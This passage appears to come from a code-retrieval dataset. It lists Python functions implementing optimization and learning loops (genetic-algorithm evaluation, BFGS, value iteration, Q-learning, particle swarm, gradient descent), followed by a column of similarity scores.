into distinct pieces\n if Optimizer.structure=='Defect':\n if Optimizer.fixed_region==True or Optimizer.finddefects==False:\n if debug:\n logger.info('Identifying atoms in defect structure based on ID')\n individ[0]=totalsol[0:nat]\n bul=totalsol[(nat):len(totalsol)]\n individ[0].set_cell(csize)\n else:\n if debug:\n logger.info('Applying find defects scheme to identify R1 and R2 for Defect')\n if 'FD' in Optimizer.debug:\n outt=find_defects(totalsol,Optimizer.solidbulk,Optimizer.sf,atomlistcheck=Optimizer.atomlist,trackvacs=Optimizer.trackvacs,trackswaps=Optimizer.trackswaps,debug=Optimizer.debugfile)\n else:\n outt=find_defects(totalsol,Optimizer.solidbulk,Optimizer.sf,atomlistcheck=Optimizer.atomlist,trackvacs=Optimizer.trackvacs,trackswaps=Optimizer.trackswaps,debug=False)\n individ[0]=outt[0]\n bul=outt[1]\n individ.vacancies = outt[2]\n individ.swaps = outt[3]\n STR += outt[4]\n indiv=individ[0]\n elif Optimizer.structure=='Surface':\n if debug:\n logger.info('Finding surface top layer')\n top,bul=find_top_layer(totalsol,Optimizer.surftopthick)\n indiv=top.copy()\n individ[0]=top.copy()\n bul = Atoms()\n elif Optimizer.structure=='Crystal':\n if debug:\n logger.info('Checking crystal cell type')\n celltype = check_cell_type(totalsol)\n STR+='Cell structure = {0}\\n'.format(celltype)\n bul = Atoms()\n individ[0] = totalsol.copy()\n elif Optimizer.structure=='Cluster':\n volume = get_cluster_volume(totalsol)\n bul = Atoms()\n if debug:\n logger.info('Translating cluster back to smaller box size location')\n totalsol.translate([-Optimizer.large_box_size/2.0,-Optimizer.large_box_size/2.0,-Optimizer.large_box_size/2.0])\n totalsol.set_cell(origcell)\n individ[0] = totalsol.copy()\n \n # Add concentration energy dependence\n if Optimizer.forcing=='energy_bias':\n if debug:\n logger.info('Applying energy bias for atoms with different number of atoms of type than in atomlist')\n n=[0]*len(Optimizer.atomlist)\n for i in range(len(Optimizer.atomlist)):\n n[i]=len([inds for inds in totalsol if inds.symbol==Optimizer.atomlist[i][0]])\n n[i]=abs(n[i]-Optimizer.atomlist[i][1])\n factor=sum(n)**3\n energy=(energy+factor)/totalsol.get_number_of_atoms()\n STR+='Energy with Bias = {0}\\n'.format(energy)\n elif Optimizer.forcing=='chem_pot':\n if debug:\n logger.info('Applying chemical potential bias for atoms with different number of atoms of type than in atomlist')\n n=[0]*len(Optimizer.atomlist)\n for i in range(len(Optimizer.atomlist)):\n n[i]=len([inds for inds in totalsol if inds.symbol==Optimizer.atomlist[i][0]])\n n[i]=n[i]*Optimizer.atomlist[i][3]\n factor=sum(n)\n energy=(energy+factor)/totalsol.get_number_of_atoms()\n STR+='Energy with Chemical Potential = {0}\\n'.format(energy)\n\n individ.energy=energy\n individ.buli=bul\n individ.pressure=pressure\n individ.volume=volume\n \n if Optimizer.fingerprinting:\n if debug:\n logger.info('Identifying fingerprint of new structure')\n individ.fingerprint=get_fingerprint(Optimizer,individ,Optimizer.fpbin,Optimizer.fpcutoff)\n if Optimizer.parallel:\n calc.clean()\n signal = 'Evaluated individual {0} on {1}\\n'.format(individ.index,rank)\n signal +=STR\n else:\n signal=STR\n\n return energy, bul, individ, signal", "def search_method(self): \n self.setup_problem()\n self.problem_results = minimize(self._problem, \n self.algorithm, \n self.termination,\n seed=1,\n verbose=False)\n \n self.log_debug('Core design variables determined: {}'.format(self.current_design_variables))", "def __call__(self):\n self.start()\n numberOfIterations, stateVectorConv = 
self.iterations()\n if numberOfIterations <= 1:\n self.answer = None\n raise DidNotConvergeWarning(\"Number of iterations <= 1.\")\n result = self.diagnostic(numberOfIterations, stateVectorConv)\n return result", "def _step1_optimization_closure(self, iteration, step):\n if iteration == self.num_iter_first_step - 1:\n reg_noise_std = 0\n else:\n reg_noise_std = (1 / 1000.) * (iteration // 300) # TODO: make it dependent on the max number of iterations\n aug = self._get_augmentation(iteration)\n if iteration == self.num_iter_first_step - 1:\n aug = 0\n # creates left_net_inputs and right_net_inputs by adding small noise\n clean_net_input = self.clean_net_inputs[aug] + (self.clean_net_inputs[aug].clone().normal_() * reg_noise_std)\n # watermark_net_input = self.watermark_net_inputs[aug] # + (self.watermark_net_input.clone().normal_())\n # mask_net_input = self.mask_net_inputs[aug]\n # applies the nets\n self.clean_net_output = self.clean_net(clean_net_input)\n self.total_loss = 0\n self.blur = 0\n self.total_loss += self.extended_l1_loss(self.clean_net_output,\n self.image_torchs[aug],\n (1 - self.watermark_hint_torchs[aug]))\n self.total_loss.backward(retain_graph=True)", "def step(self) -> ResultDict:\n # Do we have to run `self.evaluate()` this iteration?\n # `self.iteration` gets incremented after this function returns,\n # meaning that e.g. the first time this function is called,\n # self.iteration will be 0.\n evaluate_this_iter = (\n self.config.evaluation_interval is not None\n and (self.iteration + 1) % self.config.evaluation_interval == 0\n )\n\n # Results dict for training (and if applicable: evaluation).\n results: ResultDict = {}\n\n # Parallel eval + training: Kick off evaluation-loop and parallel train() call.\n if evaluate_this_iter and self.config.evaluation_parallel_to_training:\n (\n results,\n train_iter_ctx,\n ) = self._run_one_training_iteration_and_evaluation_in_parallel()\n # - No evaluation necessary, just run the next training iteration.\n # - We have to evaluate in this training iteration, but no parallelism ->\n # evaluate after the training iteration is entirely done.\n else:\n results, train_iter_ctx = self._run_one_training_iteration()\n\n # Sequential: Train (already done above), then evaluate.\n if evaluate_this_iter and not self.config.evaluation_parallel_to_training:\n results.update(self._run_one_evaluation(train_future=None))\n\n # Attach latest available evaluation results to train results,\n # if necessary.\n if not evaluate_this_iter and self.config.always_attach_evaluation_results:\n assert isinstance(\n self.evaluation_metrics, dict\n ), \"Algorithm.evaluate() needs to return a dict.\"\n results.update(self.evaluation_metrics)\n\n if hasattr(self, \"workers\") and isinstance(self.workers, WorkerSet):\n # Sync filters on workers.\n self._sync_filters_if_needed(\n central_worker=self.workers.local_worker(),\n workers=self.workers,\n config=self.config,\n )\n # TODO (avnishn): Remove the execution plan API by q1 2023\n # Collect worker metrics and combine them with `results`.\n if self.config._disable_execution_plan_api:\n episodes_this_iter = collect_episodes(\n self.workers,\n self._remote_worker_ids_for_metrics(),\n timeout_seconds=self.config.metrics_episode_collection_timeout_s,\n )\n results = self._compile_iteration_results(\n episodes_this_iter=episodes_this_iter,\n step_ctx=train_iter_ctx,\n iteration_results=results,\n )\n\n # Check `env_task_fn` for possible update of the env's task.\n if self.config.env_task_fn is not None:\n if not 
callable(self.config.env_task_fn):\n raise ValueError(\n \"`env_task_fn` must be None or a callable taking \"\n \"[train_results, env, env_ctx] as args!\"\n )\n\n def fn(env, env_context, task_fn):\n new_task = task_fn(results, env, env_context)\n cur_task = env.get_task()\n if cur_task != new_task:\n env.set_task(new_task)\n\n fn = functools.partial(fn, task_fn=self.config.env_task_fn)\n self.workers.foreach_env_with_context(fn)\n\n return results", "def runIteration(self, task, Sol, Fitness, xb, fxb, A, r, S, Q, v, **dparams):\n\t\tfor i in range(self.NP):\n\t\t\tA[i], r[i] = self.selfAdaptation(A[i], r[i])\n\t\t\tQ[i] = self.Qmin + (self.Qmax - self.Qmin) * self.uniform(0, 1)\n\t\t\tv[i] += (Sol[i] - xb) * Q[i]\n\t\t\tif self.rand() > r[i]: S[i] = self.localSearch(best=xb, A=A[i], task=task, i=i, Sol=Sol)\n\t\t\telse: S[i] = task.repair(Sol[i] + v[i], rnd=self.Rand)\n\t\t\tFnew = task.eval(S[i])\n\t\t\tif (Fnew <= Fitness[i]) and (self.rand() < (self.A_l - A[i]) / self.A): Sol[i], Fitness[i] = S[i], Fnew\n\t\t\tif Fnew <= fxb: xb, fxb = S[i].copy(), Fnew\n\t\treturn Sol, Fitness, xb, fxb, {'A': A, 'r': r, 'S': S, 'Q': Q, 'v': v}", "def run(self, function, beta):\n if self.info_requested(Info.ok):\n self.info_set(Info.ok, False)\n\n# step = function.step(beta)\n\n z = betanew = betaold = beta\n\n if self.info_requested(Info.time):\n t = []\n if self.info_requested(Info.fvalue):\n f = []\n if self.info_requested(Info.converged):\n self.info_set(Info.converged, False)\n\n for i in xrange(1, max(self.min_iter, self.max_iter) + 1):\n\n if self.info_requested(Info.time):\n tm = utils.time_cpu()\n\n z = betanew + ((i - 2.0) / (i + 1.0)) * (betanew - betaold)\n\n step = function.step(z)\n\n betaold = betanew\n betanew = function.prox(z - step * function.grad(z),\n step)\n\n if self.info_requested(Info.time):\n t.append(utils.time_cpu() - tm)\n if self.info_requested(Info.fvalue):\n f.append(function.f(betanew))\n\n if self.conesta_stop is not None:\n mu_min = self.conesta_stop[0]\n# print \"mu_min:\", mu_min\n mu_old = function.set_mu(mu_min)\n# print \"mu_old:\", mu_old\n stop_step = function.step(betanew)\n# print \"step :\", step\n # Take one ISTA step for use in the stopping criterion.\n stop_z = function.prox(betanew - stop_step \\\n * function.grad(betanew),\n stop_step)\n function.set_mu(mu_old)\n# print \"err :\", maths.norm(betanew - z)\n# print \"sc err:\", (1.0 / step) * maths.norm(betanew - z)\n# print \"eps :\", self.eps\n\n if (1. 
/ stop_step) * maths.norm(betanew - stop_z) < self.eps \\\n and i >= self.min_iter:\n\n if self.info_requested(Info.converged):\n self.info_set(Info.converged, True)\n\n break\n\n else:\n if step > 0.0:\n if (1.0 / step) * maths.norm(betanew - z) < self.eps \\\n and i >= self.min_iter:\n\n if self.info_requested(Info.converged):\n self.info_set(Info.converged, True)\n\n break\n\n else: # TODO: Fix this!\n if maths.norm(betanew - z) < self.eps \\\n and i >= self.min_iter:\n\n if self.info_requested(Info.converged):\n self.info_set(Info.converged, True)\n\n break\n\n self.num_iter = i\n\n if self.info_requested(Info.num_iter):\n self.info_set(Info.num_iter, i)\n if self.info_requested(Info.time):\n self.info_set(Info.time, t)\n if self.info_requested(Info.fvalue):\n self.info_set(Info.fvalue, f)\n if self.info_requested(Info.ok):\n self.info_set(Info.ok, True)\n\n return betanew", "def run(self):\n results = self._optimization.run()\n self._optimization.sim.fdtd.close()\n \n # plot optimization recap figure\n plt.show()\n \n return [results[0], np.array(results[1])]", "def optimize(w, b, X, Y, num_iterations,learning_rate,print_cost = False):\n costs = []\n for i in range(num_iterations):\n\n # Cost and gradient calculation (≈ 1-4 lines of code)\n ### START CODE HERE ###\n grads,cost = propagate(w,b,X,Y)\n ### END CODE HERE ###\n\n # Retrieve derivatives from grads\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n\n # update rule (≈ 2 lines of code)\n ### START CODE HERE ###\n w = w - learning_rate*dw\n b = b - learning_rate*db\n ### END CODE HERE ###\n\n # Record the costs\n if i % 100 == 0:\n costs.append(cost)\n\n # Print the cost every 100 training examples\n if print_cost and i%100==0:\n print(\"Cost after iteration %i: %f\"%(i,cost))\n\n params = {\n \"w\":w,\n \"b\":b\n }\n grads = {\n \"dw\":dw,\n \"db\":db\n }\n return params,grads,costs", "def solve(self, **kwargs) -> OptimizationResult:\n raise NotImplementedError", "def optimize(self, maxiter):\n for iteration in range(maxiter):\n self.sortParticles()\n self.phi = int(phiMin + iteration *((phiMax - phiMin) / float(maxiter)))\n self.cluster()\n #self.ConnectClusters()\n for i in range(self.n_particles):\n x = self.particles_pos[i]\n v = self.velocities[i]\n p_best = self.p_best[i]\n self.velocities[i] = self.update_velocity(x, v, p_best , self.g_best , self.getLbestOfCluster(self.getClusterOfParticle(i)) , i)\n self.particles_pos[i] = self.update_position(x, v)\n # Update the best position for particle i\n if self.func(self.particles_pos[i]) < self.func(p_best):\n self.p_best[i] = self.particles_pos[i]\n # Update the best position overall\n if self.func(self.particles_pos[i]) < self.func(self.g_best):\n \n self.g_best = self.particles_pos[i]\n return self.g_best, self.func(self.g_best)", "def run():\n return estimate(0,1,0)", "def optimize(self, startPoint=0, epsilon=1e-5, maxIterations=100):\n n = len(startPoint)\n alpha = 1\n Hk = numpy.eye(n)\n I = numpy.eye(n)\n k = 0\n xk = startPoint\n gk = self.g(xk)\n \n while 1:\n # Compute the norm of the gradient.\n gradNorm = numpy.sqrt(numpy.dot(gk, gk))\n\n # Display the function value for the current iteration.\n fk = f(xk)\n print \"%d: fval = %f, norm = %f\" % (k, fk, gradNorm) \n \n # Termination based on tolerance criterion.\n if (gradNorm <= epsilon):\n print \"Terminating: Tolerance %f (fval = %f, norm = %f)\"\\\n % (epsilon, fk, gradNorm)\n return {'optimalPoint':xk, 'functVal':fk}\n\n # Termination due to maximum iterations.\n if (k > maxIterations):\n print \"Terminating: Max 
iterations %d (fval = %f, norm = %f)\" \\\n % (k, fk, gradNorm) \n return {'optimalPoint':xk, 'functVal':fk}\n\n # Computing the search direction.\n pk = -numpy.dot(Hk, gk)\n sk = alpha * pk\n xk1 = xk + sk\n gk1 = self.g(xk1)\n yk = gk1 - gk\n\n # Computing Hk1.\n rhok = 1.0 / numpy.dot(yk, sk)\n A = I - (rhok * numpy.outer(sk, yk))\n B = rhok * numpy.outer(sk, sk)\n Hk = numpy.dot(numpy.dot(A, Hk), A.T) + B\n\n # Update the variables for the next iteration.\n xk = xk1\n gk = gk1\n k += 1\n pass \n pass", "def value_iteration(self):\n #Create a utility function of the environment shape\n gamma = 0.9\n epsilon = 0.01\n iteration = 0\n\n #create a utility function that matches the size of the number of states\n u = np.zeros(self.env.observation_space.n, dtype=float)\n\n u_copy = u.copy()\n\n #Create the reward grid\n reward = np.array([state_map.get(sublist) for state in frozen_lake.MAPS[self.env.spec._kwargs.get('map_name')] for sublist in state])\n\n T = self.frozen_transition()\n\n graph_list = list()\n\n #keep track of the convergence\n policy_convergence = list()\n\n while True:\n delta = 0\n iteration += 1\n u = u_copy.copy()\n graph_list.append(u)\n start_time = time()\n for s in range(self.env.observation_space.n):\n r = reward[s]\n v = np.zeros((1, self.env.observation_space.n), dtype=float)\n v[0, s] = 1.0\n u_copy[s] = self.return_state_utility(v, T, u, r, gamma)\n delta = max(delta, np.abs(u_copy[s] - u[s]))\n policy_convergence.append({'iter': iteration, 'delta': delta})\n if delta < epsilon * (1 - gamma) / gamma:\n print(\"Total Iterations: {}\".format(iteration))\n print(\"=================== VALUE ITERATION RESULT ==================\")\n print(\"Iterations: \" + str(iteration))\n print(\"Delta: \" + str(delta))\n print(\"Gamma: \" + str(gamma))\n print(\"Epsilon: \" + str(epsilon))\n print(\"Time to converge: {} seconds\".format(time() - start_time))\n print(\"===================================================\")\n utility_reshape = np.reshape(u, (int(np.sqrt(self.env.observation_space.n)), int(np.sqrt(self.env.observation_space.n))))\n print (np.array(utility_reshape, dtype=float))\n print(\"===================================================\")\n break\n\n return u", "def algorithm(self):\n convergence_threshold = 50\n reward_num_threshold = 300\n alpha = 1\n gamma = 0.5\n while (self.reward_num < reward_num_threshold) and (self.count<convergence_threshold):\n print('------')\n print('Iteration', self.reward_num, '/', reward_num_threshold)\n print('Iterations w/out Q-update:', self.count, '/', convergence_threshold)\n # select a possible action (any of them; all are valid)\n s = self.get_state_num()\n print(\"Initial state:\", s)\n a = random.choice(np.arange(3))\n self.apply_action(a)\n while self.reward == None:\n #print(\"Sleeping to wait for reward\")\n rospy.sleep(0.5)\n reward = self.reward\n print(\"REWARD =\", reward)\n self.reward = None\n if reward == 0:\n next_state = self.get_state_num()\n mx = np.amax(self.Q[next_state])\n else:\n ## There is no next state if nonzero reward seen\n mx = 0\n update = self.Q[s][a] + alpha*(reward+gamma*mx-self.Q[s][a])\n if self.Q[s][a] != update:\n print(\"Update Q matrix\")\n self.Q[s][a] = update\n self.count = 0\n else:\n self.count += 1\n\n print(\"Finished calculating Q-Matrix\\n\\n\\n\\n\\n\\n\\n\")", "def experiment_callback(self, args):\n # If args is None, that means that an exception was raised during the\n # execution of the experiment. 
In such case, ignore it\n if not args:\n self.n_fail += 1\n return\n # Extract parameters\n params, results, duration = args\n self.n_success += 1\n # Store results\n self.results.add(params, results)\n self.exp_durations.append(duration)\n if self.n_success % self.summary_freq == 0:\n # Number of experiments scheduled to be executed\n n_scheduled = self.n_exp - (self.n_fail + self.n_success)\n # Compute ETA\n n_cores = min(mp.cpu_count(), self.n_proc)\n mean_duration = sum(self.exp_durations) / len(self.exp_durations)\n eta = timestr(n_scheduled * mean_duration / n_cores, False)\n # Print summary\n logger.info('SUMMARY | Completed: %d, Failed: %d, Scheduled: %d, ETA: %s',\n self.n_success, self.n_fail, n_scheduled, eta)", "def optimize_self(self):\n self.compute_predicate_values();\n \"\"\" Firstly, adjust f(x) to be > alpha_0. \"\"\"\n for i in range(len(self.RING_PARA_PAIR_CD)):\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]);\n self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # update internal VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # update internal ALPHA;\n for i in range(len(self.RING_PARA_PAIR_CC)):\n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>>\n # print( RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID] ); # ---------------------------------------------------------------->>>>>\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CC[i]); \n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>> \n # print(self.RING_PARA_PAIR_CC[i][0].VECTOR); # ---------------------------------------------------------------->>>>>\n # print(RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]); # ---------------------------------------------------------------->>>>>\n # print(self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1])); # ---------------------------------------------------------------->>>>>\n # print( np.cumprod( self.RING_PARA_PAIR_CC[i][1] - self.RING_PARA_PAIR_CC[i][0].VECTOR )[-1] ); # ---------------------------------------------------------------->>>>>\n self.RING_PARA_PAIR_CC[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]; # update internal VECTOR;\n self.RING_PARA_PAIR_CC[i][2] = self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1]); # update internal ALPHA;\n \"\"\" Secondly, adjust so that alpha_0 < p_min(y_n) < q_min(x_n) \"\"\" \n P_MIN = 99999999.0; Q_MIN = 99999999.0;P_MAX = 0.0;Q_MAX = 0.0;\n CD_ID = 0;CD_MIN=0;\n # find the minimum polynomial value among the conclusion predicates\n for RING_PARA_PAIR in self.RING_PARA_PAIR_CC:\n if Q_MIN>RING_PARA_PAIR[2]: Q_MIN=RING_PARA_PAIR[2];\n # if Q_MAX<RING_PARA_PAIR[2]: Q_MAX=RING_PARA_PAIR[2];\n # update TARGET_ALPHA of the rings that are not below the conclusion minimum; \n for RING_PARA_PAIR in self.RING_PARA_PAIR_CD:\n if P_MIN>RING_PARA_PAIR[2]: P_MIN=RING_PARA_PAIR[2];CD_MIN=CD_ID;# self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MIN;\n # if P_MAX<RING_PARA_PAIR[2]: P_MAX=RING_PARA_PAIR[2];self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MAX;\n CD_ID+=1;\n self.RING_PARA_PAIR_CD[CD_MIN][3]=-Q_MIN; \n # optimize the rings that are not below the conclusion minimum \n for i in range(len(self.RING_PARA_PAIR_CD)): \n if self.RING_PARA_PAIR_CD[i][3]!=ALPHA:\n if P_MIN>Q_MIN:\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]); \n 
self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # update internal VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # update internal ALPHA;" ]
[ "0.65901256", "0.6476958", "0.64748776", "0.639814", "0.63832265", "0.6313094", "0.6264372", "0.6213871", "0.6205301", "0.61710924", "0.6140338", "0.6129752", "0.60806435", "0.6051773", "0.6009665", "0.60076827", "0.60076827", "0.5998235", "0.59467274", "0.5933865", "0.59092945", "0.5902032", "0.5897183", "0.58852327", "0.58791524", "0.5870821", "0.587045", "0.58695805", "0.5826524", "0.58217716", "0.5811564", "0.58035845", "0.57533544", "0.57514393", "0.57400596", "0.5728194", "0.5716536", "0.5714253", "0.5691625", "0.56797856", "0.5678571", "0.5673598", "0.5673598", "0.5673598", "0.56608415", "0.565868", "0.5620482", "0.5611053", "0.5607042", "0.56070036", "0.56066334", "0.56029123", "0.5579653", "0.557771", "0.5566541", "0.5564588", "0.55512685", "0.5538573", "0.5522365", "0.5516557", "0.5514994", "0.551131", "0.5507184", "0.54994106", "0.5497955", "0.54953885", "0.5484313", "0.54802305", "0.54674804", "0.546602", "0.545959", "0.5452608", "0.5442806", "0.5436651", "0.5433038", "0.5431733", "0.54188627", "0.5415806", "0.5414562", "0.5409718", "0.54096365", "0.5408973", "0.54072285", "0.54042345", "0.54035723", "0.54016334", "0.54009604", "0.5389468", "0.5389379", "0.53853405", "0.5384501", "0.53743196", "0.5370644", "0.5367415", "0.5362922", "0.5360071", "0.5356477", "0.5356105", "0.5351363", "0.534829", "0.53475076" ]
0.0
-1
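Each record in this dump carries the same columns: a natural-language query, a positive document (a code snippet), a metadata dict naming the training objective, a list of hard negatives with index-aligned negative_scores, and the positive's document_score and document_rank. As a minimal sketch of how a record like this might be consumed for the triplet objective declared in the metadata — illustrative only; the Record container and build_triplets helper are hypothetical names, not part of the dataset or of any loader API:

from dataclasses import dataclass, field
from typing import List, Tuple

@dataclass
class Record:
    # Hypothetical container mirroring the columns shown in this dump.
    query: str
    document: str
    negatives: List[str] = field(default_factory=list)        # hard-negative code snippets
    negative_scores: List[str] = field(default_factory=list)  # aligned one-to-one with `negatives`

def build_triplets(record: Record, k: int = 5) -> List[Tuple[str, str, str]]:
    # Rank negatives by retrieval score, hardest (highest-scoring) first,
    # and emit (query, positive, negative) triplets for a triplet loss.
    ranked = sorted(zip(record.negatives, map(float, record.negative_scores)),
                    key=lambda pair: pair[1], reverse=True)
    return [(record.query, record.document, neg) for neg, _ in ranked[:k]]

# Toy usage shaped like the record that follows:
rec = Record(query="About Nurevam or person by mention info",
             document="async def info(self, ctx, *, person): ...",
             negatives=["def mention(self) -> str: ...", "def display_person(person): ..."],
             negative_scores=["0.66", "0.61"])
for triplet in build_triplets(rec):
    print(triplet)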
About Nurevam or person by mention info
async def info(self,ctx,*,person:discord.Member = None): if not person: guild = len(self.bot.guilds) member = len(set(self.bot.get_all_members())) app = await self.bot.application_info() msg = "Name:{}".format(self.bot.user) if ctx.message.guild.me.nick: msg += "\nNickname:{}".format(ctx.message.guild.me.nick) msg += "\nCreator: {}".format(app.owner) msg += "\nServer:{}\nMembers:{}".format(guild,member) link = "If you want to invite this bot to your server, you can check it out here <http://nurevam.site>!" return await self.bot.say(ctx,content = "```xl\n{}\n```\n{}\n".format(msg,link)) else: e = discord.Embed() e.title = "{} - {}".format(person,person.id) e.set_thumbnail(url = person.avatar_url) e.add_field(name = "Created at", value="{} - ({})".format(person.created_at,self.get_time_delta(person.created_at)),inline=False) e.add_field(name = "Joined at", value="{} - ({})".format(person.joined_at,self.get_time_delta(person.joined_at)),inline=False) e.add_field(name = "Total Roles", value=str(len(person.roles)),inline=False) if person.colour.value: e.colour = person.color await self.bot.say(ctx,embed = e)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mention(self) -> str:", "def mention(self) -> str:", "def display_person(person):\n name = person['name']\n followers = person['follower_count']\n description = person['description']\n country = person['country']\n print(f'{name}, a(n) {description}, from {country}.')\n return followers", "async def user(self, ctx, member: discord.Member = None):\r\n rank = 1\r\n if member is None:\r\n member = ctx.author\r\n x = member.name\r\n for (k, v) in sorted(player.items(), key=lambda x: expose(x[1]), reverse=True):\r\n if k == x:\r\n start = '```md' + u\"\\u000A\" + '-'*68 + u\"\\u000A\" + u\"\\u000A\" + 'User Info: '\r\n middle = u\"\\u000A\" + u\"\\u000A\" + '[rank][#' + str(rank) + '] [rating]['\r\n end = str(round(expose(v), 2)) + '] [skill][' + str(round(v.mu, 2)) + '] [uncertainty]['\r\n await ctx.send(start + k + middle + end + str(round(v.sigma, 2)) + ']' + u\"\\u000A\" + u\"\\u000A\" + '-'*68 + u\"\\u000A\" + '```')\r\n if rank == 1:\r\n await ctx.send(k + ' is the G O A T 🐐')\r\n break\r\n rank += 1", "def get_person_text(self, uid):\n words = \"\"\n\n query = \"\"\"\nSELECT ?overview ?researchO ?label\nWHERE\n{\n <%s> <http://vivoweb.org/ontology/core#overview> ?overview .\n <%s> <http://vivoweb.org/ontology/core#researchOverview> ?researchO .\n <%s> <http://www.w3.org/2000/01/rdf-schema#label> ?label .\n}\n \"\"\" % (uid, uid, uid)\n self.setQuery(query)\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n words = \"%s %s %s\" % (g['results']['bindings'][0]['overview']['value'], g['results']['bindings'][0]['researchO']['value'], g['results']['bindings'][0]['label']['value'])\n except:\n print \"Select failed: %s\" % query\n\n self.setQuery(\"\"\"\nPREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX vivo: <http://vivoweb.org/ontology/core#>\nPREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\nSELECT ?name\nWHERE\n{\n ?auth vivo:relates <%s> .\n ?auth rdf:type vivo:Authorship .\n ?auth vivo:relates ?art .\n filter (?art!=<%s>) .\n ?art <http://vivoweb.org/ontology/core#dateTimeValue> ?date .\n ?date <http://vivoweb.org/ontology/core#dateTime> ?year .\n filter (?year>\"2009-01-01T00:00:00Z\"^^xsd:dateTime) .\n ?art rdfs:label ?name .\n}\nLIMIT 20\n\"\"\" % (uid, uid))\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n for t in g['results']['bindings']:\n words = words + \" \" + t['name']['value']\n\n except:\n print \"Select failed\"\n traceback.print_exc(file=sys.stdout)\n\n self.setQuery(\"\"\"\nPREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX vivo: <http://vivoweb.org/ontology/core#>\nPREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\n\nSELECT ?name\nWHERE\n{\n ?grant vivo:relates <%s> .\n ?grant rdf:type vivo:Grant .\n ?grant <http://vivoweb.org/ontology/core#dateTimeInterval> ?date .\n ?date <http://vivoweb.org/ontology/core#end> ?end .\n ?end <http://vivoweb.org/ontology/core#dateTime> ?year .\n filter (?year>\"2009-01-01T00:00:00Z\"^^xsd:dateTime) .\n ?grant rdfs:label ?name .\n}\n\n \"\"\" % (uid))\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n\n for t in g['results']['bindings']:\n words = words + \" \" + t['name']['value']\n\n except:\n print \"Select failed\"\n traceback.print_exc(file=sys.stdout)\n\n\n\n\n return words", "def author_following(self):\n\t\tpass", "async def ign_whoami(self, ctx):\n user = ctx.message.author\n igns = self.names.get(user.mention)\n 
if not igns:\n await self.bot.say(\"You have not yet entered any IGN info. :cry:\".format(user.mention))\n else:\n await self.bot.say(self.format_igns(user, igns))", "def mention(result):\n return result.text.find('@') != -1", "def mention(self) -> str:\n raise NotImplementedError", "async def ign_whois(self, user: discord.Member):\n igns = self.names.get(user.mention)\n if not igns:\n await self.bot.say(\"{0} has not yet entered any IGN info. :cry:\".format(user.mention))\n else:\n await self.bot.say(self.format_igns(user, igns))", "def mention(cls, user, message, mentioned):\r\n pass", "def detect_author(user_to_tweets: Dict[str, List[tuple]], tweet_text: str) -> \\\n str:\n acc = []\n \n for keys in user_to_tweets:\n author_hashes = hashtag_seperator(user_to_tweets[keys])\n text_hashes = extract_hashtags(tweet_text)\n if set(text_hashes).issubset(author_hashes):\n acc.append(keys)\n if len(acc) == 1:\n return acc[0]\n return 'unknown'", "def get_info(hit):\n mention = Mention(hit)\n return dict(\n url = mention.info[\"url\"],\n title = mention.info[\"title\"],\n date = mention.info[\"datetime_date\"] or datetime.date(1970, 1, 1),\n type = 'news' if mention.in_the_news else 'print',\n author = '(need author)',\n media = mention.info[\"media\"],\n )", "def _get_user_mention(self, name: str) -> str:\n try:\n return self.known_user_ids[name]\n except KeyError:\n pass\n\n mention = name\n users = get_value_from_redis('slack-members') or []\n user = self._get_user(name, users)\n if user:\n mention = f'<@{user[\"id\"]}>'\n\n self.known_user_ids[name] = mention\n\n return mention", "def get_author_info(self, author: str):\n for writer_word in self._writer_words:\n data = json.loads(requests.get(WIKIDATA_SEARCH + \"&srsearch=\" + author + \" \" + writer_word).text)\n pages = data.get(\"query\").get(\"search\")\n if len(pages) >= 1:\n pageid = pages[0].get(\"title\")\n author_details = self._reference.author_map.get(author)\n if author_details:\n return author_details\n if pageid == -1:\n continue\n\n else:\n response = requests.get(WIKIDATA_PARSE + pageid + \".json\")\n data = json.loads(response.text)\n if author.lower() not in data.get(\"entities\").get(pageid).get(\"labels\").get(\"en\").get(\"value\").lower():\n continue\n else:\n try:\n id = data.get(\"entities\").get(pageid).get(\"claims\").get(\"P31\")[0].get(\"mainsnak\").get(\"datavalue\").get(\"value\").get(\"id\")\n if str(id) != \"Q5\": # the id for human\n continue\n except IndexError:\n continue\n properties = data.get(\"entities\").get(pageid).get(\"claims\")\n author_details = {\"id\": pageid, \"gender\": self.get_gender(properties)}\n country_details = self.get_country(properties)\n author_details[\"country\"] = country_details\n self._reference.author_map[author] = author_details\n return author_details\n 